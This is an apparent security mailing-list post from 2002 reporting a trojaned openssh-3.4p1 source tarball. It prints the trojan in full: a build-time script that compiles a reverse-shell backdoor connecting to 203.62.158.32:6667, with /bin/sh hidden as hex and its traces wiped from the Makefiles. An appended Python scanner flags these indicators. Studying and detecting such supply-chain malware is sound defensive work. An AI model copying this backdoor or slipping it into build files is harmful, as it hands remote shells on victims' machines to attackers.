Security Incidents mailing list archives
Trojan located in latest openssh tar files
From: Artur Lindgren <bond () comitnet se>
Date: Thu, 1 Aug 2002 13:59:06 +0200
Greetings,

I noticed that openssh-3.4p1 has a trojan horse (available from
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz
and some of the mirrors:
ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/
ftp://ftp.usa.openbsd.org/pub/OpenBSD/OpenSSH/
ftp://ftp1.se.openbsd.org/pub/OpenBSD/OpenSSH/ ).

After compiling the file bf-test.c you will notice that it does the following:

# testing in raw ecb mode
#!/bin/sh
cat >conftest.c <<_ACEOF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <errno.h>
#include <signal.h>
#include <setjmp.h>
jmp_buf env;
int s;
char *i_val="\x2f\x62\x69\x6e\x2f\x73\x68";   /* hex-encoded "/bin/sh" */
void sig(int sig){close(s);sleep(3600);longjmp(env,0);}
int main(){
  int x;char c,*a[2];struct sockaddr_in sa;struct sigaction act;
  switch(fork()){case 0:break;default:exit(0);}   /* daemonise */
  close(0);close(1);close(2);
  memset(&act,0,sizeof(act));act.sa_handler=sig;
  sigaction(SIGALRM,&act,NULL);
  do{
    setjmp(env);
    if((s=socket(AF_INET,SOCK_STREAM,0))==(-1))exit(1);
    memset(&sa,0,sizeof(sa));sa.sin_family=AF_INET;
    sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr("203.62.158.32");
    alarm(10);
    if(connect(s,(struct sockaddr*)&sa,sizeof(sa))==(-1))exit(1);
    if((x=read(s,&c,1))==(-1)){exit(1);}
    else if(x==1){
      switch(c){
        case 'A':exit(0);                              /* kill the daemon */
        case 'D':alarm(0);dup2(s,0);dup2(s,1);dup2(s,2); /* shell on the socket */
                 a[0]=i_val;a[1]=NULL;execve(a[0],a,NULL);break;
        case 'M':alarm(0);sig(0);break;                /* sleep, then reconnect */
        default:break;
      }
    }else{exit(0);}
  }while(1);
}
_ACEOF
(grep -v -i bf-test Makefile.in > m.out ; cp m.out Makefile.in ; rm -f m.out
grep -v -i bf-test Makefile > m.out ; cp m.out Makefile ; rm -f m.out
rm -f bf-test*
TESTPROG="`basename \"\`grep $USER: /etc/passwd\`\"`"
if ! test $TESTPROG ; then TESTPROG=sh; fi
gcc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
gcc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
cc -w conftest.c -o $TESTPROG ; PATH=.:$PATH $TESTPROG
if test $TESTPROG;then rm -f ./conftest ./conftest.c $TESTPROG && exit;fi
cc -w conftest.c -lsocket -lnsl -o $TESTPROG; PATH=.:$PATH $TESTPROG
rm -f ./conftest ./conftest.c $TESTPROG) 1>/dev/null 2>&1

It runs once, upon compilation of openssh, and is named sh or the compiling user's default shell in the process listing. This trojan attempts to connect to 203.62.158.32:6667 (hacked machine which has been secured now), and awaits one of three characters as the command:

D  execs /bin/sh
M  respawns
A  kills the daemon

The /bin/sh executed via the D command was controlled by the daemon listening on 203.62.158.32:6667, potentially meaning that people affected by this have given a shell, possibly root, to an unknown user.

<Hans> "Let this be a lesson. Don't use root unless you REALLY have to."

Regards,
Artur Lindgren, Comitnet AB

Special thanks to (Ratler, Mrsaint, Jordan, Drabant, Hans and all of you ISP people in Sweden :D)
Thanks to ^Sarge^ for quickly taking care of the hacked machine this trojan connected to.
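The post gives enough concrete tell-tales to check an unpacked tarball before running configure: a bf-test reference in Makefile.in or Makefile, a file named bf-test*, the hard-coded address 203.62.158.32, htons(6667), and "/bin/sh" hidden as \x2f\x62\x69\x6e\x2f\x73\x68 so it does not appear in a plain strings search. The scanner below is an added example, not part of the original post or of OpenSSH; it walks a source tree for exactly those indicators, expands C-style hex escapes before matching, and runs against a constructed sample tree (one clean file, one planted Makefile.in and bf-test.c carrying the same tell-tales, not the full trojan). The file and function names are the example's own.

```python
"""Indicator scan for a source tree, based on the tell-tales quoted in the post above.

Added example; not the post's or OpenSSH's code. The sample tree at the bottom is
constructed for the demonstration.
"""
import re
import tempfile
from pathlib import Path

C2_ADDR = "203.62.158.32"      # address the trojan connects to (from the post)
C2_PORT = 6667                 # port the trojan connects to (from the post)
TROJAN_STEM = "bf-test"        # file the trojaned Makefile.in builds and runs

_HEX_RUN = re.compile(r"(?:\\x[0-9a-fA-F]{2}){2,}")
_BUILD_FILES = {"Makefile", "Makefile.in", "configure", "configure.ac"}
_SRC_SUFFIXES = {".c", ".h", ".in", ".sh"}


def decode_hex_escapes(text):
    """Expand runs of C-style \\xNN escapes so obfuscated literals become readable,
    e.g. "\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68" -> "/bin/sh"."""
    def expand(m):
        return bytes.fromhex(m.group(0).replace("\\x", "")).decode("latin-1")
    return _HEX_RUN.sub(expand, text)


def scan_text(name, text):
    """Return human-readable findings for one file's contents (empty list if clean)."""
    findings = []
    decoded = decode_hex_escapes(text)
    base = Path(name).name
    if C2_ADDR in text:
        findings.append(f"{name}: hard-coded address {C2_ADDR}")
    if re.search(rf"htons\s*\(\s*{C2_PORT}\s*\)", text):
        findings.append(f"{name}: connects to port {C2_PORT}")
    # Legitimate sources mention /bin/sh in the clear; only flag it when it is
    # present after decoding but absent from the raw text (i.e. deliberately hidden).
    if "/bin/sh" in decoded and "/bin/sh" not in text:
        findings.append(f"{name}: hex-obfuscated /bin/sh literal")
    if all(tok in text for tok in ("connect(", "dup2(", "execve(")):
        findings.append(f"{name}: socket wired to a shell (connect/dup2/execve)")
    if base in _BUILD_FILES and TROJAN_STEM in text:
        findings.append(f"{name}: build file references {TROJAN_STEM}")
    if base.startswith(TROJAN_STEM):
        findings.append(f"{name}: unexpected file {base} in tree")
    return findings


def scan_tree(root):
    """Scan build files and C/shell sources under root; return all findings."""
    findings = []
    for path in sorted(Path(root).rglob("*")):
        if not path.is_file():
            continue
        if path.name not in _BUILD_FILES and path.suffix not in _SRC_SUFFIXES:
            continue
        text = path.read_text(encoding="latin-1")
        findings.extend(scan_text(str(path.relative_to(root)), text))
    return findings


# Constructed sample tree: a clean source, a Makefile.in with the planted bf-test
# target, and a bf-test.c carrying the tell-tales (a fragment, not the trojan itself).
SAMPLE_TREE = {
    "Makefile.in": "all: ssh sshd\n\nbf-test: bf-test.c\n\t$(CC) -o $@ bf-test.c\n",
    "bf-test.c": (
        'char *i_val="\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68";\n'
        'sa.sin_port=htons(6667);sa.sin_addr.s_addr=inet_addr("203.62.158.32");\n'
        'connect(s,(struct sockaddr*)&sa,sizeof(sa));dup2(s,0);execve(a[0],a,NULL);\n'
    ),
    "sshd.c": '/* clean */ const char *shell = "/bin/sh";\n',
}


def demo():
    """Write the sample tree to a temporary directory and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        for name, body in SAMPLE_TREE.items():
            (root / name).write_text(body, encoding="latin-1")
        return scan_tree(root)


if __name__ == "__main__":
    for line in demo():
        print(line)
```

Point scan_tree at a freshly unpacked tarball before running configure; any finding is reason to discard the archive and fetch it again from a mirror whose checksum you can verify independently.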
----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com